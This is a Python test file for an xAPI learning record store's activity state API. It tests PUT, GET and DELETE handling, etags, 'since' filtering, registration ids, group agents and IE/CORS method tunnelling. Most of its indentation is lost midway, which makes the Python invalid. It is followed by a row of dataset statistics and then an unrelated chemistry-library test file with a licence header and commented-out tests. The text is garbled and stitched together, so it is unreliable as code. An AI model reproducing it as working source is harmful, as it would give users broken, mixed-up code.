        self.assertEqual(robj['test'], teststateetagim['test'])
        self.assertEqual(robj['obj']['agent'], teststateetagim['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())

    def test_put_etag_missing_on_change(self):
        teststateetagim = {'test': 'etag no need for etag', 'obj': {'agent': 'test'}}
        path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
        r = self.client.put(path, teststateetagim, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(r.status_code, 204)

        r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        robj = ast.literal_eval(r.content)
        self.assertEqual(robj['test'], teststateetagim['test'])
        self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' % hashlib.sha1('%s' % teststateetagim).hexdigest())

    def test_put_without_activityid(self):
        testparamsbad = {"stateId": "bad_state", "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamsbad))
        teststatebad = {"test":"put activity state BAD no activity id","obj":{"agent":"test"}}
        put1 = self.client.put(path, teststatebad, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
self.assertIn('activityId parameter is missing', put1.content)
def test_put_without_agent(self):
testparamsbad = {"stateId": "bad_state", "activityId": self.activityId}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsbad))
teststatebad = {"test":"put activity state BAD no agent","obj":{"agent":"none"}}
put1 = self.client.put(path, teststatebad, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
self.assertIn('agent parameter is missing', put1.content)
def test_put_without_stateid(self):
testparamsbad = {"activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsbad))
teststatebad = {"test":"put activity state BAD no state id","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatebad, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
self.assertIn('stateId parameter is missing', put1.content)
# Also intended to test the 403 forbidden status (the r5 check below is currently commented out)
def test_get(self):
username = "other"
email = "other@example.com"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {'username':username,'email': email,'password':password,'password2':password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], self.teststate1['test'])
self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
r2 = self.client.get(self.url, self.testparams2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r2.status_code, 200)
robj2 = ast.literal_eval(r2.content)
self.assertEqual(robj2['test'], self.teststate2['test'])
self.assertEqual(robj2['obj']['agent'], self.teststate2['obj']['agent'])
self.assertEqual(r2['etag'], '"%s"' % hashlib.sha1(r2.content).hexdigest())
r3 = self.client.get(self.url, self.testparams3, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r3.status_code, 200)
robj3 = ast.literal_eval(r3.content)
self.assertEqual(robj3['test'], self.teststate3['test'])
self.assertEqual(robj3['obj']['agent'], self.teststate3['obj']['agent'])
self.assertEqual(r3['etag'], '"%s"' % hashlib.sha1(r3.content).hexdigest())
r4 = self.client.get(self.url, self.testparams4, X_Experience_API_Version="1.0.0", Authorization=auth)
self.assertEqual(r4.status_code, 200)
robj4 = ast.literal_eval(r4.content)
self.assertEqual(robj4['test'], self.teststate4['test'])
self.assertEqual(robj4['obj']['agent'], self.teststate4['obj']['agent'])
self.assertEqual(r4['etag'], '"%s"' % hashlib.sha1(r4.content).hexdigest())
# r5 = self.client.get(self.url, self.testparams3, X_Experience_API_Version="1.0.0", Authorization=auth)
# self.assertEqual(r5.status_code, 403)
def test_get_no_existing_id(self):
testparams = {"stateId": "testID", "activityId": self.activityId, "agent": self.testagent}
r = self.client.get(self.url, testparams, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 404)
def test_get_ids(self):
params = {"activityId": self.activityId, "agent": self.testagent}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
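# 'since' filtering: a state stored with an older 'updated' timestamp must be
# excluded from the stateId listing whenever 'since' is later than that timestamp.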
def test_get_with_since(self):
state_id = "old_state_test"
testparamssince = {"stateId": state_id, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
teststatesince = {"test":"get w/ since","obj":{"agent":"test"}}
updated = datetime.datetime(2012, 6, 12, 12, 00).replace(tzinfo=timezone.get_default_timezone())
put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamssince, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatesince['test'])
self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
since = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params2 = {"activityId": self.activityId, "agent": self.testagent, "since": since}
r = self.client.get(self.url, params2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(state_id, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
self.client.delete(self.url, testparamssince, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_get_with_since_tz(self):
state_id = "old_state_test"
testparamssince = {"stateId": state_id, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
teststatesince = {"test":"get w/ since","obj":{"agent":"test"}}
updated = datetime.datetime(2012, 6, 12, 12, 00).replace(tzinfo=timezone.get_default_timezone())
put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamssince, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatesince['test'])
self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
state_id2 = "new_tz_state_test"
testparamssince2 = {"stateId": state_id2, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince2))
teststatesince2 = {"test":"get w/ since TZ","obj":{"agent":"test"}}
updated_tz = "2012-7-1T13:30:00+04:00"
put2 = self.client.put(path, teststatesince2, content_type=self.content_type, updated=updated_tz, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put2.status_code, 204)
self.assertEqual(put2.content, '')
r2 = self.client.get(self.url, testparamssince2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r2.status_code, 200)
robj2 = ast.literal_eval(r2.content)
self.assertEqual(robj2['test'], teststatesince2['test'])
self.assertEqual(robj2['obj']['agent'], teststatesince2['obj']['agent'])
self.assertEqual(r2['etag'], '"%s"' % hashlib.sha1(r2.content).hexdigest())
since = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params2 = {"activityId": self.activityId, "agent": self.testagent, "since": since}
r = self.client.get(self.url, params2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(state_id, r.content)
self.assertNotIn(state_id2, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
self.client.delete(self.url, testparamssince, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, testparamssince2, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_get_with_since_and_regid(self):
# create old state w/ no registration id
state_id = "old_state_test_no_reg"
testparamssince = {"stateId": state_id, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
teststatesince = {"test":"get w/ since","obj":{"agent":"test","stateId":state_id}}
updated = datetime.datetime(2012, 6, 12, 12, 00).replace(tzinfo=utc)
put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamssince, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatesince['test'])
self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
# create old state w/ registration id
regid = str(uuid.uuid1())
state_id2 = "old_state_test_w_reg"
testparamssince2 = {"registration": regid, "activityId": self.activityId, "agent": self.testagent, "stateId":state_id2}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince2))
teststatesince2 = {"test":"get w/ since and registration","obj":{"agent":"test","stateId":state_id2}}
put2 = self.client.put(path, teststatesince2, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put2.status_code, 204)
self.assertEqual(put2.content, '')
r2 = self.client.get(self.url, testparamssince2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r2.status_code, 200)
robj2 = ast.literal_eval(r2.content)
self.assertEqual(robj2['test'], teststatesince2['test'])
self.assertEqual(robj2['obj']['agent'], teststatesince2['obj']['agent'])
self.assertEqual(r2['etag'], '"%s"' % hashlib.sha1(r2.content).hexdigest())
# create new state w/ registration id
state_id3 = "old_state_test_w_new_reg"
testparamssince3 = {"registration": regid, "activityId": self.activityId, "agent": self.testagent, "stateId":state_id3}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince3))
teststatesince3 = {"test":"get w/ since and registration","obj":{"agent":"test","stateId":state_id3}}
put3 = self.client.put(path, teststatesince3, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put3.status_code, 204)
self.assertEqual(put3.content, '')
r3 = self.client.get(self.url, testparamssince3, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r3.status_code, 200)
robj3 = ast.literal_eval(r3.content)
self.assertEqual(robj3['test'], teststatesince3['test'])
self.assertEqual(robj3['obj']['agent'], teststatesince3['obj']['agent'])
self.assertEqual(r3['etag'], '"%s"' % hashlib.sha1(r3.content).hexdigest())
# get no reg ids set w/o old state
since1 = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params = {"activityId": self.activityId, "agent": self.testagent, "since": since1}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(state_id, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
# get reg id set w/o old state
since2 = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params2 = {"registration": regid, "activityId": self.activityId, "agent": self.testagent, "since": since2}
r = self.client.get(self.url, params2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(state_id3, r.content)
self.assertNotIn(state_id2, r.content)
self.assertNotIn(self.stateId, r.content)
self.assertNotIn(self.stateId2, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
self.client.delete(self.url, testparamssince, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, testparamssince2, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, testparamssince3, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_get_without_activityid(self):
params = {"stateId": self.stateId, "agent": self.testagent}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 400)
self.assertIn('activityId parameter is missing', r.content)
def test_get_without_agent(self):
params = {"stateId": self.stateId, "activityId": self.activityId}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 400)
self.assertIn('agent parameter is missing', r.content)
def test_delete_without_activityid(self):
testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"delete activity state w/o activityid","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsregid, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateregid['test'])
self.assertEqual(robj['obj']['agent'], teststateregid['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
f_r = self.client.delete(self.url, {"registration": self.registration, "stateId": self.stateId, "agent": self.testagent}, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(f_r.status_code, 400)
self.assertIn('activityId parameter is missing', f_r.content)
del_r = self.client.delete(self.url, testparamsregid, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(del_r.status_code, 204)
def test_delete_without_agent(self):
testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"delete activity state w/o agent","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsregid, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateregid['test'])
self.assertEqual(robj['obj']['agent'], teststateregid['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
f_r = self.client.delete(self.url, {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId}, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(f_r.status_code, 400)
self.assertIn('agent parameter is missing', f_r.content)
del_r = self.client.delete(self.url, testparamsregid, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(del_r.status_code, 204)
def test_delete_set(self):
testparamsdelset1 = {"registration": self.registration, "stateId": "del_state_set_1", "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsdelset1))
teststatedelset1 = {"test":"delete set #1","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatedelset1, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsdelset1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatedelset1['test'])
self.assertEqual(robj['obj']['agent'], teststatedelset1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
testparamsdelset2 = {"registration": self.registration, "stateId": "del_state_set_2", "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsdelset2))
teststatedelset2 = {"test":"delete set #2","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatedelset2, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsdelset2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj2 = ast.literal_eval(r.content)
self.assertEqual(robj2['test'], teststatedelset2['test'])
self.assertEqual(robj2['obj']['agent'], teststatedelset2['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
f_r = self.client.delete(self.url, {"registration": self.registration, "agent": self.testagent, "activityId": self.activityId}, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(f_r.status_code, 204)
r = self.client.get(self.url, testparamsdelset1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 404)
self.assertIn('no activity', r.content)
r = self.client.get(self.url, testparamsdelset2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 404)
self.assertIn('no activity', r.content)
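# Legacy IE/CORS support: PUT and DELETE are tunneled through POST using a
# '?method=...' query parameter, with the real headers and body carried in a
# form-encoded payload (the xAPI alternate request syntax).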
def test_ie_cors_put_delete(self):
username = "another test"
email = "anothertest@example.com"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {'username':username,'email': email,'password':password,'password2':password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
testagent = '{"name":"another test","mbox":"mailto:anothertest@example.com"}'
sid = "test_ie_cors_put_delete_set_1"
path = '%s?%s' % (self.url, urllib.urlencode({"method":"PUT"}))
content = {"test":"test_ie_cors_put_delete","obj":{"actor":"another test"}}
param = "stateId=%s&activityId=%s&agent=%s&content=%s&Content-Type=application/x-www-form-urlencoded&Authorization=%s&X-Experience-API-Version=1.0.0" % (sid, self.activityId, testagent, content, auth)
put1 = self.client.post(path, param, content_type='application/x-www-form-urlencoded')
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, {"stateId": sid, "activityId": self.activityId, "agent": testagent}, X_Experience_API_Version="1.0.0", Authorization=auth)
self.assertEqual(r.status_code, 200)
c = ast.literal_eval(r.content)
self.assertEqual(c['test'], content['test'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1('%s' % content).hexdigest())
dparam = "agent=%s&activityId=%s&Authorization=%s&Content-Type=application/x-www-form-urlencoded&X-Experience-API-Version=1.0.0" % (testagent,self.activityId,auth)
path = '%s?%s' % (self.url, urllib.urlencode({"method":"DELETE"}))
f_r = self.client.post(path, dparam, content_type='application/x-www-form-urlencoded')
self.assertEqual(f_r.status_code, 204)
def test_agent_is_group(self):
username = "the group"
email = "the.group@example.com"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {'username':username,'email': email,'password':password,'password2':password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
ot = "Group"
name = "the group"
mbox = "mailto:the.group@example.com"
members = [{"name":"agent1","mbox":"mailto:agent1@example.com"},
{"name":"agent2","mbox":"mailto:agent2@example.com"}]
testagent = json.dumps({"objectType":ot, "name":name, "mbox":mbox,"member":members})
testparams1 = {"stateId": "group.state.id", "activityId": self.activityId, "agent": testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparams1))
teststate1 = {"test":"put activity state using group as agent","obj":{"agent":"group of 2 agents"}}
put1 = self.client.put(path, teststate1, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
get1 = self.client.get(self.url, {"stateId":"group.state.id", "activityId": self.activityId, "agent":testagent}, X_Experience_API_Version="1.0.0", Authorization=auth)
self.assertEqual(get1.status_code, 200)
robj = ast.literal_eval(get1.content)
self.assertEqual(robj['test'], teststate1['test'])
self.assertEqual(robj['obj']['agent'], teststate1['obj']['agent'])
self.assertEqual(get1['etag'], '"%s"' % hashlib.sha1(get1.content).hexdigest())
delr = self.client.delete(self.url, testparams1, Authorization=auth, X_Experience_API_Version="1.0.0")
self.assertEqual(delr.status_code, 204)
def test_post_new_state(self):
param = {"stateId": "test:postnewstate", "activityId": "act:test/post.new.state", "agent": '{"mbox":"mailto:testagent@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = {"post":"testing new state", "obj":{"f1":"v1","f2":"v2"}}
r = self.client.post(path, json.dumps(state), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 200)
self.assertEqual(ast.literal_eval(r.content), state)
self.client.delete(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_post_blank_state(self):
param = {"stateId": "test:postnewblankstate", "activityId": "act:test/post.new.blank.state", "agent": '{"mbox":"mailto:testagent@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = ""
r = self.client.post(path, state, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 400)
self.assertEqual(r.content, 'No body in request')
def test_post_update_state(self):
param = {"stateId": "test:postupdatestate", "activityId": "act:test/post.update.state", "agent": '{"mbox":"mailto:test@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = {"field1":"value1", "obj":{"ofield1":"oval1","ofield2":"oval2"}}
r = self.client.post(path, json.dumps(state), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 200)
self.assertEqual(ast.literal_eval(r.content), state)
state2 = {"field_xtra":"xtra val", "obj":"ha, not a obj"}
r = self.client.post(path, json.dumps(state2), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 200)
retstate = ast.literal_eval(r.content)
self.assertEqual(retstate['field1'], state['field1'])
self.assertEqual(retstate['field_xtra'], state2['field_xtra'])
self.assertEqual(retstate['obj'], state2['obj'])
self.client.delete(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_nonjson_put_state(self):
param = {"stateId": "thisisnotjson", "activityId": "act:test/non.json.accepted", "agent": '{"mbox":"mailto:test@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = "this is not json"
r = self.client.put(path, state, content_type="text/plain", Authorization=self.auth, X_Experience_API_Version="1.0.1")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.1")
self.assertEqual(r.status_code, 200)
self.assertEqual(r['Content-Type'], "text/plain")
self.assertEqual(r.content, state)
| 57.777778 | 208 | 0.670051 | 4,961 | 39,000 | 5.137271 | 0.05765 | 0.096524 | 0.051087 | 0.07663 | 0.817429 | 0.783371 | 0.759986 | 0.731696 | 0.714706 | 0.70062 | 0 | 0.029044 | 0.171026 | 39,000 | 674 | 209 | 57.863501 | 0.759264 | 0.010692 | 0 | 0.518095 | 0 | 0.00381 | 0.143368 | 0.025407 | 0 | 0 | 0 | 0 | 0.379048 | 0 | null | null | 0.022857 | 0.028571 | null | null | 0.001905 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7eb4ae6ce7492ba3e32d7997fc94dd5de4209a8 | 8,705 | py | Python | tests/test_datasheet.py | brunokiyoshi/thermo | 5b31d21fd087dd0fc3302f023c5f3c52d9cbee3b | [
"MIT"
] | null | null | null | tests/test_datasheet.py | brunokiyoshi/thermo | 5b31d21fd087dd0fc3302f023c5f3c52d9cbee3b | [
"MIT"
] | null | null | null | tests/test_datasheet.py | brunokiyoshi/thermo | 5b31d21fd087dd0fc3302f023c5f3c52d9cbee3b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
import pytest
import pandas as pd
from thermo.datasheet import *
from thermo.chemical import Chemical
# These tests slow down implementation of new methods too much.
#@pytest.mark.meta_Chemical
#def test_tabulate_solid():
# df = tabulate_solid('sodium hydroxide', pts=2)
# df_as_dict = {'Constant-pressure heat capacity, J/kg/K': {496.14999999999998: 1267.9653086278533, 596.14999999999998: 1582.2714391628249}, 'Density, kg/m^3': {496.14999999999998: 2130.0058046853483, 596.14999999999998: 2130.0058046853483}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
#
#@pytest.mark.meta_Chemical
#def test_tabulate_gas():
# df = tabulate_gas('hexane', pts=2)
# df_as_dict = {'Constant-pressure heat capacity, J/kg/K': {178.07499999999999: 1206.4098393032568, 507.60000000000002: 2551.4044899160472}, 'Viscosity, Pa*S': {178.07499999999999: 3.6993265691382959e-06, 507.60000000000002: 1.0598974706090609e-05}, 'Isentropic exponent': {178.07499999999999: 1.0869273799268073, 507.60000000000002: 1.0393018803424154}, 'Joule-Thompson expansion coefficient, K/Pa': {178.07499999999999: 0.00016800664986363302, 507.60000000000002: 7.8217064543503734e-06}, 'Isobaric expansion, 1/K': {178.07499999999999: 0.015141550023997695, 507.60000000000002: 0.0020523335027846585}, 'Prandtl number': {178.07499999999999: 0.69678226644585661, 507.60000000000002: 0.74170212695888871}, 'Density, kg/m^3': {178.07499999999999: 8.3693048957953522, 507.60000000000002: 2.0927931856300876}, 'Constant-volume heat capacity, J/kg/K': {178.07499999999999: 1109.9268098154776, 507.60000000000002: 2454.9214604282679}, 'Thermal diffusivity, m^2/s': {178.07499999999999: 6.3436058798806709e-07, 507.60000000000002: 6.8282280730497638e-06}, 'Thermal consuctivity, W/m/K': {178.07499999999999: 0.0064050194540236464, 507.60000000000002: 0.036459746670141478}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
#
#@pytest.mark.meta_Chemical
#def test_tabulate_liq():
# df = tabulate_liq('hexane', Tmin=280, Tmax=350, pts=2)
# df_as_dict = {'Constant-pressure heat capacity, J/kg/K': {280.0: 2199.5376248501448, 350.0: 2509.3959378687496}, 'Viscosity, Pa*S': {280.0: 0.0003595695325135477, 350.0: 0.00018618849649397316}, 'Saturation pressure, Pa': {280.0: 8624.370564055087, 350.0: 129801.09838575375}, 'Joule-Thompson expansion coefficient, K/Pa': {280.0: 3.4834926941752087e-05, 350.0: 3.066272687922139e-05}, 'Surface tension, N/m': {280.0: 0.019794991465879444, 350.0: 0.01261221127458579}, 'Prandtl number': {280.0: 6.2861632870484234, 350.0: 4.5167171403747597}, 'Isobaric expansion, 1/K': {280.0: 0.001340989794772991, 350.0: 0.0016990766161286714}, 'Density, kg/m^3': {280.0: 671.28561912698535, 350.0: 606.36768482956563}, 'Thermal diffusivity, m^2/s': {280.0: 8.5209866345631262e-08, 350.0: 6.7981994628212491e-08}, 'Heat of vaporization, J/kg': {280.0: 377182.42886698805, 350.0: 328705.97080247721}, 'PermittivityLiquid': {280.0: 1.8865000000000001, 350.0: 1.802808}, 'Thermal consuctivity, W/m/K': {280.0: 0.12581389941664639, 350.0: 0.10344253187860687}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
#
#@pytest.mark.meta_Chemical
#def test_constants():
# # TODO: Hsub again so that works
# df = tabulate_constants('hexane')
